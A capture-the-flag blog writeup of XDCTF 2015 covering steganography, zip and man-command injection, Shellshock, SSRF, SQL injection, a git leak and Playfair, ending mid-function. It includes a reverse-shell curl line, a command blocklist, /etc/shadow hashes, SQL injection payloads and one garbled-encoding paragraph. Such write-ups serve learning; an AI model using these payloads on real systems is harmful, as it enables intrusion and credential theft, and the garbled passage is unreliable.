LoRexxar's Blog

XDCTF2015-writeup

2015/10/04

Just finished XDCTF over the October holiday. We did not get a good ranking, but we still saw plenty of clever things; there is a lot to learn from p神's challenges, and this was my first encounter with GitHack, so I will have to study git properly when I get the time.

Because I could only solve a limited number of the problems myself, this post collects writeups for all of them, including some pasted from other teams (will remove on request).

MISC

XDCTF's misc problems were a mystery to me; I only solved one, so most of what follows comes from the writeups of stronger teams.

0x01 misc1 image encryption (BrainTools)

The original image looked like this.
We started by comparing the given image against the original and found that the pixels in the first two rows differed, but could not work out why until a hint was released; after googling we found this:
https://github.com/mbikovitsky/BrainTools

Running it on the image decodes the pixel data into Brainfuck, which explains why the first two rows differed by a few bits. Running the Brainfuck program in an online interpreter gives the flag.

0x02 misc2 zip known-plaintext attack

The challenge gave us a file with the hint "zip", so we ran binwalk -e on it and got two zips, one encrypted and one not. Looking closely, both archives contain a readme.txt with the same CRC, which means the file is identical in both, so a known-plaintext attack applies (the classic attack on ZipCrypto needs a few plaintext bytes of one encrypted file, and the unencrypted copy provides all of them).
On Windows the tool Advanced Archive Password Recovery handles this very well.

Open the flag.txt inside to get the flag.

From other teams' writeups I also learned of the command-line tool pkcrack for the same attack.

0x03 misc3 image steganography + zlib

The original image is here. Analysis showed an obvious pixel difference down the leftmost column, but we had no idea how to turn it into 0/1 bits and could not form a sensible string from it. Below is the Python 2 / PIL analysis script from one of the top teams (`import Image` is the old PIL import; under Pillow it is `from PIL import Image`):

>>> import Image
>>> a=Image.open('zxczxc.png')
>>> a.point(lambda i: 255 if i&1 else 0).show()
>>> for i in xrange(100):
...     print a.getpixel((0,i))
...
(252, 255, 254)
(253, 252, 255)
(254, 252, 252)
(254, 253, 254)
(252, 255, 253)
(252, 253, 254)
(253, 254, 252)
(254, 252, 255)
(253, 255, 253)
(252, 253, 254)
(254, 253, 252)
(254, 253, 253)
(253, 254, 253)
(252, 253, 254)
(252, 255, 252)
...

According to their writeup, the pixel values only vary in the two lowest bits (every channel is 252 to 255), so that is where the data is hidden. The bit string is therefore built in pixel order, then R, G, B order, and within each channel the second-lowest bit followed by the lowest bit (forgive me: I did not understand this sentence at the time, and had never handled images in Python, so I could not follow their script):

>>> s=''
>>> for i in xrange(165):
...     p=a.getpixel((0,i))
...     for k in xrange(3):
...         s+='1' if p[k]&2 else '0'
...         s+='1' if p[k]&1 else '0'
...
>>> s
'0011100100111000001001100011010001100110001000110111010001101001001001010110010001100011001100100011000100110000001011100011001
>>> def tostr(s):
...     ret=''
...     for i in xrange(0, len(s), 8):
...         ret+=chr(int(s[i:i+8],2))
...     return ret
...
>>> tostr(s)
'98&4f#ti%dc210.27.10.195-2015-09-16T05:21:52+02:0098&4f#ti%dcx\xda\xabHI.I\xab..1NO\xcc3H/2)\
>>>

鍙互鐪嬪埌閲岄潰鏈変竴涓瞚p鍜屾椂闂达紝鍚庨潰鐪嬪埌x\xda澶达紝浜庢槸鍙戠幇鏄痾lib compressed,浜庢槸

1
2
3
>>> import zlib
>>> zlib.decompress('x\xda\xabHI.I\xab..1NO\xcc3H/2)\xc8\xa8\xd4M\xcdK6H1\xd657\xae(\xd15\xcc
'xdctf{st3gan0gr4phy-enc0d3-73xt-1nto-1m4ge}'

Get flag!
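The extraction above, as an added example that is not from the original page or the team's script: a Python 3 version with no PIL dependency that works on a list of RGB tuples (a constructed near-white column stands in for column 0 of the challenge PNG, which is not reproduced here), generalises the "two low bits per channel" layout to any number of bits, embeds a payload so the round trip can be checked, and locates the zlib stream by validating its two header bytes instead of spotting x\xda by eye. The prefix string and pixel values are constructed.

```python
import zlib

FLAG = b"xdctf{st3gan0gr4phy-enc0d3-73xt-1nto-1m4ge}"


def carrier_pixels(n=165):
    """Constructed stand-in for column 0 of the challenge PNG: near-white RGB
    pixels whose low bits will be overwritten (values 252..255 like the page)."""
    return [(252 + i % 4, 253 + i % 3, 254 - i % 2) for i in range(n)]


def embed(pixels, payload, nbits=2):
    """Write payload into the nbits low bits of each channel: pixel order,
    R then G then B, high bit of the group first (the layout the writeup found)."""
    bits = "".join(f"{b:08b}" for b in payload)
    keep = 0xFF & ~((1 << nbits) - 1)          # mask that clears the low bits
    out, pos = [], 0
    for p in pixels:
        channels = []
        for ch in p[:3]:
            chunk = bits[pos:pos + nbits].ljust(nbits, "0")   # zero-pad past the end
            pos += nbits
            channels.append((ch & keep) | int(chunk, 2))
        out.append(tuple(channels))
    if pos < len(bits):
        raise ValueError("carrier too small for payload")
    return out


def extract_bits(pixels, nbits=2):
    """The page's extraction loop, generalised to nbits low bits per channel."""
    bits = []
    for p in pixels:
        for ch in p[:3]:
            for b in range(nbits - 1, -1, -1):
                bits.append("1" if ch & (1 << b) else "0")
    return "".join(bits)


def bits_to_bytes(bits):
    whole = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, whole, 8))


def find_zlib_and_inflate(data):
    """Scan for a valid zlib header (CM=8 in the low nibble of byte 0 and the
    16-bit header a multiple of 31) and inflate from there. Trailing bytes after
    the stream, e.g. the zero padding left in unused pixels, are ignored."""
    for i in range(len(data) - 1):
        if (data[i] & 0x0F) == 8 and ((data[i] << 8) | data[i + 1]) % 31 == 0:
            d = zlib.decompressobj()
            try:
                out = d.decompress(data[i:])
            except zlib.error:
                continue
            if d.eof:                     # a complete stream ended here
                return out
    return None


def round_trip():
    """Hide a zlib-compressed flag behind a plain-text prefix, then recover it."""
    prefix = b"98&4f#ti%dc"              # constructed, mimicking the page's leading text
    stego = embed(carrier_pixels(), prefix + zlib.compress(FLAG, 9))   # level 9 -> x\xda header
    recovered = bits_to_bytes(extract_bits(stego))
    return find_zlib_and_inflate(recovered)


if __name__ == "__main__":
    print(round_trip())
```

The header test is the one zlib itself applies (RFC 1950: CMF*256 + FLG must be divisible by 31), so it rejects a stray 'x' in the plaintext prefix and only inflates from a real stream start.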

0x04 misc4

0x05 misc5 man command injection

A very eye-opening problem; I had never seen anything like it before. First nc to the service; the prompt is:
Do you know what's the most useful command in linux?
Some quick testing showed two things:
1. Typing [f-z] triggers an error while [g-z] does not, so there must be a file starting with f, presumably the flag file (it turned out to be named flag?).
2. The man command works.

Reading up on man: the -P option sets the pager program, so man -P xxx man runs xxx, which can be used to read files.
Browsing around this way I found /etc/passwd and /etc/shadow,
and that /home/ctf exists alongside a /home/neighbor-old-wang (later it turned out we would have to come back here).
So I started browsing /home/ctf; with no further information and no way to run other commands there was still nothing, until by chance:

man /home/ctf/.viminfo

revealed one useful fact, that an nc_test.sh exists, so:

/home/ctf/nc_test.sh

That gave the key information: man -P 'ls' ls executes a command. With that I found the flag? directory, and inside it .flag, which said the information is over at neighbor-old-wang's place; but reading neighbor-old-wang requires privileges. I was basically stuck here, and then misc500 crashed. Below is the approach from another team's writeup; the first part is essentially the same.

They found that running man -P set & dumps the shell functions behind the service (the indentation was lost in the dump; it is restored here):

check_lenth ()
{
    count=$(echo $1 | wc -m);
    if [[ $count -gt $2 ]]; then
        echo "Argument too long, 40 limit.";
        exit 2;
    fi
}
clean_up ()
{
    if [[ -z $chat_room ]]; then
        cat bye;
        exit;
    else
        echo -e "\033[1;34m$msg_date\033[0m\033[1;31m $username \033[0m\033[1;34mleaved room\033[0m \033[1;36m \"$room_name\" \033[0m" >> $chat_room;
        cat bye;
        exit;
    fi
}
hander ()
{
    m_cmd=$1;
    m_option=$2;
    m_selfcmd=$@;
    if [[ $m_cmd == 'man' ]]; then
        if [[ $m_option == '-P' ]]; then
            if [[ -n `echo $m_selfcmd | grep "\""` && `echo $m_selfcmd | cut -d "\"" -f 3` != '' ]]; then
                m_selfcmd=`echo $m_selfcmd | cut -d "\"" -f 2`;
            else
                if [[ -n `echo $m_selfcmd | grep "'"` && `echo $m_selfcmd | cut -d "'" -f 3` != '' ]]; then
                    m_selfcmd=`echo $m_selfcmd | cut -d "'" -f 2`;
                else
                    if [[ $3 == '' ]]; then
                        echo "man: option requires an argument -- 'P'
Try 'man --help' or 'man --usage' for more information.";
                    fi;
                    [[ $4 != '' ]] && m_selfcmd=$3 || echo "What manual page do you want?";
                fi;
            fi;
            if [[ $m_selfcmd == 'whoami' ]]; then
                echo "root";
            else
                if [[ -n `echo $m_selfcmd | grep -E "vim|vi|sh|kill|pkill|socat|nc|ncat|nmap|rm|chmod|passwd|etc|root|export|PATH"` ]]; then
                    echo "No way.";
                else
                    `$m_selfcmd > m_return` &> /dev/null;
                    cat m_return;
                fi;
            fi;
        else
            if [[ $m_option != '' ]]; then
                if [[ `man $m_option` == '' ]]; then
                    echo "man: option requires an argument -- '$m_option'
Try 'man --help' or 'man --usage' for more information.
";
                else
                    `man $m_option > tmp` &> /dev/null;
                    cat tmp;
                fi;
            else
                echo "What manual page do you want?";
            fi;
        fi;
    else
        echo "invalid command";
    fi
}

Reading the code shows that arbitrary commands can be run as man -P "command" &. The handler takes the text between the first pair of double quotes (or, failing that, single quotes) as the command, but only when something follows the closing quote (the cut -f 3 != '' test), which is why the trailing & is needed. It then refuses the command if the whole line contains any of
vim|vi|sh|kill|pkill|socat|nc|ncat|nmap|rm|chmod|passwd|etc|root|export|PATH
as a substring (grep -E, so cat /etc/shadow is blocked by "etc" and anything mentioning sh by "sh"), and otherwise executes it and prints its output from the m_return file.

From my earlier analysis, the tmp file in the working directory keeps the output of the previous command, which gives another way to get a script executed; their approach was still to read /etc/shadow:

root:$6$ZuPfdsng$eN.xStmAbo5SCRQm9bHpA6wtrZisadNJn9lOE./2ks3C.vUVxnKJAUIZM6PA7IEphcTgOzo4wOBz.wwD9CSDJ1:16709:0:99999:7:::
daemon:*:16661:0:99999:7:::
bin:*:16661:0:99999:7:::
sys:*:16661:0:99999:7:::
sync:*:16661:0:99999:7:::
games:*:16661:0:99999:7:::
man:*:16661:0:99999:7:::
lp:*:16661:0:99999:7:::
mail:*:16661:0:99999:7:::
news:*:16661:0:99999:7:::
uucp:*:16661:0:99999:7:::
proxy:*:16661:0:99999:7:::
www-data:*:16661:0:99999:7:::
backup:*:16661:0:99999:7:::
list:*:16661:0:99999:7:::
irc:*:16661:0:99999:7:::
gnats:*:16661:0:99999:7:::
nobody:*:16661:0:99999:7:::
libuuid:!:16661:0:99999:7:::
syslog:*:16661:0:99999:7:::
neighbor-old-wang:$6$5/yy2vJZ$Xp1MZOp4D5squxZLmgN4TLV5ktfUP2LD5Rp6l07lzyUCEES97px/a1EoIM8ZjygGrXdUDYGcoD9lGiCigosdI/:16710:0:99999:7:::
ctf:$6$tcSIbi8j$lDog8sNj0U0m.LuAy8u/MRInv9UP33HQTcPhvHFfSTgDajN.4HGJopG1PKMqOYVE7MdhDSlN6K/4DzNrEhy5D1:16709:0:99999:7:::
sshd:*:16701:0:99999:7::

Feeding this to John the Ripper gives neighbor-old-wang's password: 666666 (how did I not spot that...).

After logging in over ssh, .bash_history
says to look for the flag at www.flag.com;
/etc/hosts maps www.flag.com to 172.17.0.1,
while this machine is 172.17.0.4, so it is a different host.
So curl www.flag.com:

function status() {
    $.getJSON("/cgi-bin/status", function (data) {
        $.each( data, function( key, val ) {
            $('#infos').append ( "<li><b>"+key+"</b>: " + val + "</li>" );
        });
    });
}

Seeing /cgi-bin/status, a CGI script, suggested Shellshock, so:
curl -H 'x: () { :;}; /bin/bash -i >& /dev/tcp/VPS_IP/8899 0>&1' http://www.flag.com/cgi-bin/status
gave a reverse shell on the second host.
cat /etc/passwd then gives the final flag:
xdctf{where_there_is_a_shell_there_is_a_way}

WEB1

web1 phpjm obfuscation

The challenge was simply a trap: the page was just a description of md5 plus a test input, and after staring at it for ages I stumbled on index.php~, got the source, and found it was obfuscated with phpjm, so I used this site to decode it:
http://tool.lu/php/
The decoded check only requires the md5 of the input to "equal" 0, which is the classic trick:
md5('240610708')'s result is 0e462097431906509019562988736854.

md5('QNKCDZO')'s result is 0e830400451993494058024219903391.

PHP's loose comparison (==) treats a string of the form 0e<digits> as a number in scientific notation, 0 × 10^n = 0, so such a hash compares equal to 0 and any two such hashes compare equal to each other; a strict comparison (===) is not fooled. Get flag!
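To check the claim rather than take it on faith, here is an added example (not from the original page): it recomputes both hashes with hashlib and models PHP's == on two strings (both numeric strings are compared as numbers, anything else as bytes). The numeric-string regex is an assumption that follows PHP's definition; the model is only as faithful as that regex.

```python
import hashlib
import re

# PHP's notion of a "numeric string" (assumed model): optional sign, digits,
# optional fraction, optional exponent; leading whitespace allowed.
PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_eq(a: str, b: str) -> bool:
    """Model of PHP's == on two strings: when both are numeric strings they are
    compared as numbers, so '0e462...' and '0e830...' are both 0 * 10^n == 0.0."""
    if PHP_NUMERIC.match(a) and PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def php_strict_eq(a: str, b: str) -> bool:
    """PHP's === on two strings: byte-for-byte equality, no numeric coercion."""
    return a == b


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic_md5(h: str) -> bool:
    """A 'magic' hash: 0e followed only by digits, i.e. a numeric string worth 0."""
    return re.fullmatch(r"0e\d+", h) is not None


def check_page_claims():
    """Recompute the two hashes quoted on the page and compare them both ways."""
    a, b = md5_hex("240610708"), md5_hex("QNKCDZO")
    return {
        "hash_a": a,
        "hash_b": b,
        "both_magic": is_magic_md5(a) and is_magic_md5(b),
        "loose_equal": php_loose_eq(a, b),     # True: the bug the challenge relies on
        "strict_equal": php_strict_eq(a, b),   # False: === compares the actual strings
    }


if __name__ == "__main__":
    print(check_page_claims())
```

The fix on the PHP side is to compare hashes with === (or hash_equals()), never with ==.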

web2 Apache Tomcat session manipulation

This one taught me something new. Browsing the page source showed an examples directory, and Tomcat's examples webapp is known to ship a servlet that lets you set arbitrary session attributes:
/examples/servlets/servlet/SessionExample
Open it, set login=true and user=Administrator, then go back to the login page and get the flag. (This is exactly why the examples webapp should never be left on a production Tomcat.)

web3 LFI + SSRF + SQLi

Poking at the challenge revealed an arbitrary file read, so:

http://133.130.90.188/?link=file://index.php

returns the source:

<?php
if (isset($_GET['link'])) {
    $link = $_GET['link'];
    // disable sleep
    if (strpos(strtolower($link), 'sleep') || strpos(strtolower($link), 'benchmark')) {
        die('No sleep.');
    }
    if (strpos($link,"http://") === 0) {
        // http
        $curlobj = curl_init($link);
        curl_setopt($curlobj, CURLOPT_HEADER, 0);
        curl_setopt($curlobj, CURLOPT_PROTOCOLS, CURLPROTO_HTTP);
        curl_setopt($curlobj, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($curlobj, CURLOPT_TIMEOUT, 5);
        $content = curl_exec($curlobj);
        curl_close($curlobj);
        echo $content;
    } elseif (strpos($link,"file://") === 0) {
        // file
        echo file_get_contents(substr($link, 7));
    }
} else {
    echo<<<EOF
<!--what are you looking at-->
<br><br><br>
<center>
<h1>What do you want to read?</h1>
<form method="GET" action="#">
<input style="width:300px; height:25px;" name="link" value="" />
<button style="height:25px;" type="submit">Read</button>
</form>
</center>
EOF;
}
?>

The source shows an SSRF into the internal network: the http:// branch fetches any URL with curl (restricted to plain HTTP by CURLOPT_PROTOCOLS, so no gopher:// or file:// through curl), and the file:// branch hands the rest of the string straight to file_get_contents (a beginner's confession: I did not see this at the time).
Browsing files, /etc/hosts contains a hostname:
9bd5688225d90ff2a06e2ee1f1665f40.xdctf.com
A port scan found
http://9bd5688225d90ff2a06e2ee1f1665f40.xdctf.com:3389
which is a Discuz forum, version 7.2; searching showed it has a known SQL injection (the faq.php action=grouppermission gids[] injection used in the payload below), so the payload, URL-encoded and then as typed, is:

http://133.130.90.188/?link=http%3A%2F%2F9bd5688225d90ff2a06e2ee1f1665f40.xdctf.com%3A3389%2Ffaq.php%3Faction%3Dgrouppermission%26gids%5B99%5D%3D%2527%26gids%5B100%5D%5B0%5D%3D%29%2Band%2B%28select%2B1%2Bfrom%2B%28select%2Bcount%28*%29%2Cconcat%28%28select%2B%28select%2B%28select%2Bconcat%28username%2C0x27%2Cpassword%29%2Bfrom%2Bcdb_members%2Blimit%2B1%29%2B%29%2Bfrom%2Binformation_schema.tables%2Blimit%2B0%2C1%29%2Cfloor%28rand%280%29*2%29%29x%2Bfrom%2Binformation_schema.tables%2Bgroup%2Bby%2Bx%29a%29%2523%23#

http://133.130.90.188/?link=http://9bd5688225d90ff2a06e2ee1f1665f40.xdctf.com:3389/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)+and+(select+1+from+(select+count(*),concat((select+(select+(select+concat(username,0x27,password)+from+cdb_members+limit+1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23##

The inner query is the usual error-based extraction (count(*) with group by on concat(..., floor(rand(0)*2)) forces a duplicate-key error whose message carries username'password from cdb_members). Get flag!

web4 sqli

Browsing the page source gives a hint:

It showed the picture endpoint has an injection point: injecting through ID does change which image comes back, but most of the usual functions (select, substr, union, left, right, mid and so on) are filtered. Trying other things, the lpad function still worked and can be used for boolean-based blind injection: for n no longer than the password, lpad(password, n, ' ') is simply the first n characters, so it replaces the filtered substr().
This showed that username=admin exists, so we started extracting the password:

/47bce5c74f589f4867dbd57e9ca9f808/Picture.php?ID=2"%20or%20lpad(password,21,space(1))=0x3538333234323531636236663433393137646620%23

The recovered password is a 20-character md5 fragment, so it still has to be trimmed: following the stronger players, guess it is the DedeCMS scheme, strip the first 3 and the last character to get the 16-character md5, look that up to recover the plaintext, log in with it and find the flag.

lpad turned out to be a remarkably useful function; I will study it properly in a separate post.

web2

web2 is a CMS written by p牛, and its vulnerabilities are ones he met in real engagements, so this was another eye-opener.
The challenge was as follows:

web2 git source leak

The entry point, a leaked .git directory, was something I had never dealt with. Searching for "githack" turned up a tool called GitHack, but according to p牛's own writeup it only recovers README.md here,
which contains the hint: All source files are in git tag 1.0
From that we can infer the sequence of commands the author (时雨) ran:

git init
git add .
git commit
git tag 1.0
git rm -rf *
echo "All source files are in git tag 1.0" > README.md
git add .
git commit

So the real source lives in the commit tagged 1.0.

In git's directory layout the file /.git/refs/tags/1.0 is the tag reference: it contains the SHA-1 of the commit the tag points at.
Honestly, I could not follow the rest of p神's analysis from here, so I am posting the netdisk link to study later:
http://pan.baidu.com/s/1kTq3Ceb password 2ep2
The Python script mentioned inside: password l4l8

The method we used was rip-git.pl to pull the repository; once we had the SHA-1 from the tag above, we replaced the hash in .git/refs/heads/master with it and ran $ git checkout -f
to get the source:
http://pan.baidu.com/s/1i30bgcX password gakj
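What "refs/tags/1.0 contains a commit hash" and the checkout trick rest on is git's object model, and it is worth being able to walk it without the git binary, which is often how a partially recovered .git directory has to be read. The following is an added example, not code from the page or from any of the tools it names: it builds a tiny constructed .git mirroring the inferred history (a commit with index.php tagged 1.0, then a commit that deletes it and leaves the README hint), then resolves refs (loose files or packed-refs, lightweight or annotated tags) to a commit, lists the commit's tree, and repoints master the way the writeup did by hand. The author identity and file contents are made up.

```python
import hashlib
import os
import tempfile
import zlib


def write_object(git_dir, obj_type, payload):
    """Store a loose object as git does: zlib('<type> <size>\\0' + payload) under
    objects/xx/yyyy..., named by the SHA-1 of the uncompressed bytes."""
    raw = f"{obj_type} {len(payload)}\0".encode() + payload
    sha = hashlib.sha1(raw).hexdigest()
    path = os.path.join(git_dir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(zlib.compress(raw))
    return sha


def read_object(git_dir, sha):
    with open(os.path.join(git_dir, "objects", sha[:2], sha[2:]), "rb") as f:
        raw = zlib.decompress(f.read())
    header, payload = raw.split(b"\0", 1)
    obj_type, size = header.decode().split(" ")
    if int(size) != len(payload):
        raise ValueError(f"corrupt object {sha}")
    return obj_type, payload


def read_ref(git_dir, ref):
    """A ref is a loose file (refs/tags/1.0 on the challenge server) or a line in
    packed-refs after git pack-refs / gc; '^' lines there are peeled tag targets."""
    loose = os.path.join(git_dir, ref)
    if os.path.isfile(loose):
        with open(loose) as f:
            return f.read().strip()
    packed = os.path.join(git_dir, "packed-refs")
    if os.path.isfile(packed):
        with open(packed) as f:
            for line in f:
                if line[:1] in ("#", "^"):
                    continue
                sha, _, name = line.strip().partition(" ")
                if name == ref:
                    return sha
    return None


def resolve_to_commit(git_dir, ref):
    """Follow a ref to a commit id. A lightweight tag (git tag 1.0) holds the commit
    id directly; an annotated tag holds a tag object whose 'object' line points at it."""
    sha = read_ref(git_dir, ref)
    while sha:
        obj_type, payload = read_object(git_dir, sha)
        if obj_type == "commit":
            return sha
        if obj_type != "tag":
            raise ValueError(f"{ref} resolves to a {obj_type}, not a commit")
        sha = payload.decode().split("\n", 1)[0].split(" ", 1)[1]
    return None


def tree_filenames(git_dir, commit_sha):
    """Top-level names in a commit's tree: what git checkout -f would materialise."""
    _, commit = read_object(git_dir, commit_sha)
    tree_sha = commit.decode().split("\n", 1)[0].split(" ", 1)[1]
    _, tree = read_object(git_dir, tree_sha)
    names, i = [], 0
    while i < len(tree):
        nul = tree.index(b"\0", i)
        names.append(tree[i:nul].decode().split(" ", 1)[1])   # "<mode> <name>"
        i = nul + 1 + 20                                        # skip raw 20-byte SHA-1
    return names


def build_demo_repo():
    """Constructed .git for the inferred history. Returns (git_dir, commit1, commit2)."""
    git_dir = os.path.join(tempfile.mkdtemp(), ".git")
    for sub in ("refs/heads", "refs/tags"):
        os.makedirs(os.path.join(git_dir, sub))
    who = "author <author@example.com> 1443916800 +0800"          # made-up identity
    src = write_object(git_dir, "blob", b"<?php /* real application source */ ?>\n")
    tree1 = write_object(git_dir, "tree", b"100644 index.php\0" + bytes.fromhex(src))
    commit1 = write_object(git_dir, "commit",
        f"tree {tree1}\nauthor {who}\ncommitter {who}\n\nadd source\n".encode())
    hint = write_object(git_dir, "blob", b"All source files are in git tag 1.0\n")
    tree2 = write_object(git_dir, "tree", b"100644 README.md\0" + bytes.fromhex(hint))
    commit2 = write_object(git_dir, "commit",
        f"tree {tree2}\nparent {commit1}\nauthor {who}\ncommitter {who}\n\nremove source\n".encode())
    with open(os.path.join(git_dir, "refs/heads/master"), "w") as f:
        f.write(commit2 + "\n")
    with open(os.path.join(git_dir, "refs/tags/1.0"), "w") as f:    # git tag 1.0 (lightweight)
        f.write(commit1 + "\n")
    tag_obj = write_object(git_dir, "tag",
        f"object {commit1}\ntype commit\ntag v1.0\ntagger {who}\n\nannotated\n".encode())
    with open(os.path.join(git_dir, "packed-refs"), "w") as f:       # git tag -a v1.0, then packed
        f.write(f"# pack-refs with: peeled fully-peeled\n{tag_obj} refs/tags/v1.0\n^{commit1}\n")
    return git_dir, commit1, commit2


def recover_source_commit(git_dir):
    """The writeup's step: point refs/heads/master at the commit tag 1.0 names, so a
    following 'git checkout -f' restores the deleted files. Returns that commit id."""
    target = resolve_to_commit(git_dir, "refs/tags/1.0")
    with open(os.path.join(git_dir, "refs/heads/master"), "w") as f:
        f.write(target + "\n")
    return target
```

If the tag had been annotated (git tag -a), refs/tags/1.0 would name a tag object rather than the commit, and writing that hash into refs/heads/master would break checkout; resolve_to_commit peels it first. On a real leak the loose objects may be absent because they were packed; then the same SHA-1s have to be looked up in objects/pack/*.idx instead.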

web1 front-end password reset logic flaw

Before the official hint came out, auditing the code turned up the verification-code check in /xdsec_app/front_app/controllers/Auth.php:

public function handle_resetpwd()
{
    if(empty($_GET["email"])||empty($_GET["verify"]))
    {
        $this->error("Badrequest",site_url("auth/forgetpwd"));
    }
    $user=$this->user->get_user(I("get.email"),"email");
    if(I('get.verify')!=$user['verify'])
    {
        $this->error("Your verify code is error",site_url('auth/forgetpwd'));
    }

The code is a loose != against a value taken straight from the request, so passing verify as an array instead of a string (verify[1]=aa) gets past the check. Hence the request:
http://xdsec-cms-12023458.xdctf.win/index.php/auth/resetpwd?email=xdsec-cms@xdctf.com&verify[1]=aa
A big trap here: the email is not p神's own, but the one in the copyright notice on the home page.

web3 code audit + blind injection

web4 getshell

From here on the web problems were beyond my level, so I am linking p神's writeup to study when I get the chance.
web300 writeup password: 0m33
Password for the Python injection script mentioned inside: zpys
web400 writeup password: jxbo

CRYPTO

Crypto was a mystery too; in any case, here is the solution to crypto100.

crypto100 uppercase-letter Playfair cipher

Ciphertext:

HQPEAGEPHQQUAEGQCEAGYSRUHAGPAIWNAPLONGDRZRIEEMQHOYGPOVRIBLQNALOBDPNKRPAZRACOORWRLCLOTBLUMRIABOESOFBOHQROAOENLUHQRWRDDPGUHCGPNOQLAGGBKBPGNEENLNNGEQIRARCLQDBEPDZXRACOORWRLCLOTBLUMRIABOESOFBOQNLCUARPQKAGWZZEHQHQRGTBEMOINGCPCWPIATWWQAOGRUESAMRUMEQCGPGUAPBYNGHQPGEMGXBWOBUCHQPGQAPIUQHCGPDRDPLOEAATWWQAALOBDPNKRPCTYBQOOGQBGPORFEQUDTULDFSARIPDZLNKENGDUKBEIPEFGPKKQAWGEBEFPEQOAERACOORWRLCLOTBLUMRIABOESOFBOQNCFMPIBEPOCEPQBERBBIANGHQPRLNPIGKXXCTUCENMMIANGHQPRICEMURBXKLULFOZZBTDPOFGNEVMPAPUQSRZXRACOOQBDLOTBLUMRIABOESOFBOCOAOENRUUDZZLUULBBRDCOOQCXQAAGUCCOAOENRUORXZNESKPIRPWRQKPGBOOQHQRUHGNEXGRDQHNWQAROQOWEAGEPOQBQTBLUMRIACOAZAERIRSQAALOBDPNKRPMZQCRIDZQBRDPESEBYAUVOIRGLEGAPLNCOCIEMQHAWNUORZZIRGLDGEMQHLYCPAGUDDGOQDQUFRUCMSIHQTBUQGINGWSQMCWRAUGPGPEAWQDNGFEAGKKERBEOBUCCPLDSITBEUOUUQGINGWSQMCWRAUGRGEPQKNCUGOCAAWEEDRIARDDOBUCUQGINGWSQMCWRAUGRGENGDEPBOXGPELWQNPNOIQBSNLOCHNENCTTAUKIRGBXQNDTKKPEIAKLHQLOAQIFUQHRPEOLDNDPQOCOBUBTQQPEIAKLHQAERUBUNGEQIRARCLQDBEPDIIQNGTWRALROHQRWPAPECOUQNFEPTBRZLONMGREROFANQCRUOIAQEWLFZEHQHQRGDEHQHQTBNOAGCVIAUNOOPERUMENLIAIGTHRZAOSATAHBUGLUULZZRLLROWDTBFAQBETDDGGOSATAHBQUQNHQATENIROCOWDTBFAQOANEMEGOSATAHBSEQNLUEDOCOWDTBFAQHQLOISKUCOAMGPKKQUNGQNCVNEHQPEVFPDRPYSOQZEOFHQTBUQGIGQXAMPZZPDODDPQOATOCUCZEDDALTFCOOATZCACHROEUXLEBVKDEPV

Faced with such a long run of uppercase letters I was simply stumped... what is this? The writeup showed it was just a bad habit on my part: searching for "uppercase letters cipher" immediately gives the following. (The tell-tale signs are an even length, no J, and no digraph made of two identical letters.)
The Playfair cipher (Playfair cipher or Playfair square) is a substitution cipher invented in 1854 by the Englishman Charles Wheatstone. Today it is considered thoroughly insecure.

Producing the ciphertext:
1. Choose an English word as the key and remove repeated letters. Write the key's letters one by one into a 5×5 matrix and fill the remaining cells with the unused letters in a-z order. (I and J are treated as the same letter: JOY -> IOY.)
2. Split the message into pairs. If a pair consists of the same letter twice, insert X after its first letter and regroup. If a single letter is left over, append X. (ee st um p -> EX ES TU MP)
3. For each pair, find both letters in the matrix.
4. If both letters are in the same column, take the letter below each (wrapping from the bottom row to the top: PB->IK, BT->KP).
5. If both letters are in the same row, take the letter to the right of each (wrapping from the rightmost column to the leftmost).
6. If the two letters share neither row nor column, take the other two corners of the rectangle they define, each on the same row as the letter it replaces (HI->BM).
7. The two letters found are the encryption of the original pair.

Then I found this site
http://www.cs.miami.edu/home/burt/learning/Csc609.051/programs/playn/
Its decryption was not very accurate, but it roughly read "I have a dream"; tidying that up gives the flag.
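The seven rules above, carried through in working code as an added example (not from the page or the site it links): a square builder, the digraph splitting of rule 2, one routine that applies rules 4 to 6 in either direction, and the fingerprint check that lets you recognise Playfair output in the first place. The worked values are the textbook ones whose key is "playfair example"; the rule examples quoted on the page (PB->IK, BT->KP, HI->BM) come out of the same square. Breaking the crypto100 ciphertext itself needs the key or a key search, which this block does not attempt.

```python
import string


def build_square(key):
    """Rule 1: key letters in order without repeats (J merged into I), then the
    remaining letters A-Z in order, laid out as a 5x5 matrix."""
    order = []
    for ch in (key.upper() + string.ascii_uppercase).replace("J", "I"):
        if ch.isalpha() and ch not in order:
            order.append(ch)
    return [order[i:i + 5] for i in range(0, 25, 5)]


def digraphs(text):
    """Rule 2: letter pairs; a doubled letter is split with a filler X and a
    trailing single letter is padded with X (a doubled X is split with Q)."""
    letters = [c for c in text.upper().replace("J", "I") if c.isalpha()]
    pairs, i = [], 0
    while i < len(letters):
        a = letters[i]
        b = letters[i + 1] if i + 1 < len(letters) else None
        if b is None or b == a:
            pairs.append(a + ("Q" if a == "X" else "X"))
            i += 1
        else:
            pairs.append(a + b)
            i += 2
    return pairs


def transform_pair(square, pair, step):
    """Rules 3-7 for one pair; step=+1 encrypts (down/right), step=-1 decrypts."""
    pos = {ch: (r, c) for r, row in enumerate(square) for c, ch in enumerate(row)}
    (r1, c1), (r2, c2) = pos[pair[0]], pos[pair[1]]
    if c1 == c2:                                      # rule 4: same column
        return square[(r1 + step) % 5][c1] + square[(r2 + step) % 5][c2]
    if r1 == r2:                                      # rule 5: same row
        return square[r1][(c1 + step) % 5] + square[r2][(c2 + step) % 5]
    return square[r1][c2] + square[r2][c1]            # rule 6: rectangle corners


def encrypt(plaintext, key):
    square = build_square(key)
    return "".join(transform_pair(square, p, 1) for p in digraphs(plaintext))


def decrypt(ciphertext, key):
    square = build_square(key)
    ct = [c for c in ciphertext.upper() if c.isalpha()]
    return "".join(transform_pair(square, ct[i] + ct[i + 1], -1)
                   for i in range(0, len(ct) - 1, 2))


def looks_like_playfair(ciphertext):
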